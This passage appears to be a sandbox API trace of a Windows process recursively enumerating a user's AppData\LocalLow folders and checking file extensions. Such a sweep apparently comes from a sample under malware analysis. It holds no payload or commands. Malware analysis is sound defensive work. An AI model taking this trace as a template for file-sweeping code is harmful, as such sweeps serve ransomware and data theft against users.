returned 1 [0061.247] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB") returned="" [0061.247] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x581f7ea0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x581f7ea0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xb0f4d860, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x180, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56", cAlternateFileName="828298~1")) returned 1 [0061.247] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56") returned="" [0061.247] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xec3c5340, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xec3c5340, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xb16257a0, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x188, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F", cAlternateFileName="8828F3~1")) returned 1 [0061.247] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F") returned="" [0061.247] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x8064ac00, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x8064ac00, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x80670d60, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x188, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416", cAlternateFileName="8828F3~2")) returned 1 [0061.247] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416") returned="" [0061.247] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x6aa2c0a0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6aa2c0a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xadf19ae0, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x196, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61", cAlternateFileName="8E4E51~1")) returned 1 [0061.248] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61") returned="" [0061.248] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x28dbdd20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28dbdd20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xbf0dd70, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x156, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="94308059B57B3142E455B38A6EB92015", cAlternateFileName="943080~1")) returned 1 [0061.248] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\94308059B57B3142E455B38A6EB92015") returned="" [0061.248] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x6a83cec0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a83cec0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xaebe5120, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x194, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9", cAlternateFileName="955CAB~1")) returned 1 [0061.248] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9") returned="" [0061.248] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xbf3f73d0, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbf3f73d0, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xbf3f73d0, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x186, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6", cAlternateFileName="9BC2FF~1")) returned 1 [0061.248] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6") returned="" [0061.248] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xe06277d0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe06277d0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xb15d94e0, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x182, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E", cAlternateFileName="9C888B~1")) returned 1 [0061.248] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E") returned="" [0061.248] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xe07ca6f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe07ca6f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0x965accc0, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x182, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061", cAlternateFileName="9C888B~2")) returned 1 [0061.248] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061") returned="" [0061.248] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x54bc3730, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x54bc3730, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xb11d4fc0, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x1ae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450", cAlternateFileName="A9E4F7~1")) returned 1 [0061.249] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450") returned="" [0061.249] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x53bfe570, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x53bfe570, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbe9b34f0, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x1ec, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001", cAlternateFileName="ACF244~1")) returned 1 [0061.249] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001") returned="" [0061.249] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xe04aaa10, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe04aaa10, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xae4e7080, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x1a0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852", cAlternateFileName="B3BB9C~2")) returned 1 [0061.249] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852") returned="" [0061.249] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xefc01b00, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xefc01b00, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xaa4ee1e0, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x1a0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8", cAlternateFileName="B3BB9C~1")) returned 1 [0061.249] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8") returned="" [0061.249] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x54322770, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x54322770, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbf019010, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x204, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150", cAlternateFileName="BC570E~2")) returned 1 [0061.249] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150") returned="" [0061.249] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x540c1170, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x540c1170, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbf019010, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x204, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC", cAlternateFileName="BC570E~1")) returned 1 [0061.249] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC") returned="" [0061.249] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x56bb3b80, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x56bb3b80, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xaeca3800, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873", cAlternateFileName="C46E7B~2")) returned 1 [0061.249] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873") returned="" [0061.249] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x682fbd00, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x682fbd00, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xae0bca00, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x18e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE", cAlternateFileName="C46E7B~3")) returned 1 [0061.249] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE") returned="" [0061.249] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x5461c2f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x5461c2f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbf67eb30, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x18e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF", cAlternateFileName="C46E7B~1")) returned 1 [0061.249] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF") returned="" [0061.249] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x728c68a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x728c68a0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xae63dce0, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x194, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC", cAlternateFileName="D47DBD~2")) returned 1 [0061.250] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC") returned="" [0061.250] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x545f6190, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x545f6190, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x69b6e1e0, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x198, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE", cAlternateFileName="D47DBD~1")) returned 1 [0061.250] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE") returned="" [0061.250] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x808d4a70, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x808d4a70, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x808d4a70, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x1a4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C", cAlternateFileName="D52C56~1")) returned 1 [0061.250] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C") returned="" [0061.250] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x683e0540, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x683e0540, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xb0f015a0, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x18e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585", cAlternateFileName="EA6180~1")) returned 1 [0061.250] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585") returned="" [0061.250] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xbf312b90, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbf312b90, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xbf312b90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x1a0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1", cAlternateFileName="F293AE~1")) returned 1 [0061.250] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1") returned="" [0061.250] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xedbebcc0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xedbebcc0, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xa989d730, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0xfc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="F90F18257CBB4D84216AC1E1F3BB2C76", cAlternateFileName="F90F18~1")) returned 1 [0061.250] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\F90F18257CBB4D84216AC1E1F3BB2C76") returned="" [0061.250] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xedbebcc0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xedbebcc0, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xa989d730, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0xfc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="F90F18257CBB4D84216AC1E1F3BB2C76", cAlternateFileName="F90F18~1")) returned 0 [0061.250] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0061.250] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 0 [0061.250] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0061.250] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\") returned="DOMStore\\" [0061.250] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\") returned="Internet Explorer\\" [0061.251] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0061.251] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0061.251] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0061.251] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0061.251] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0061.251] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0061.251] PathFindFileNameW (pszPath="") returned="" [0061.251] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x510b3550, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x510b3550, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0061.251] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x510b3550, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x510b3550, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0061.251] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x54b05050, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x54b05050, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="36USA68T", cAlternateFileName="")) returned 1 [0061.251] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x605dd8a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x605dd8a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="3O75JDME", cAlternateFileName="")) returned 1 [0061.251] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x510b3550, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbaf619f0, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x8000, dwReserved0=0xa0000003, dwReserved1=0x0, 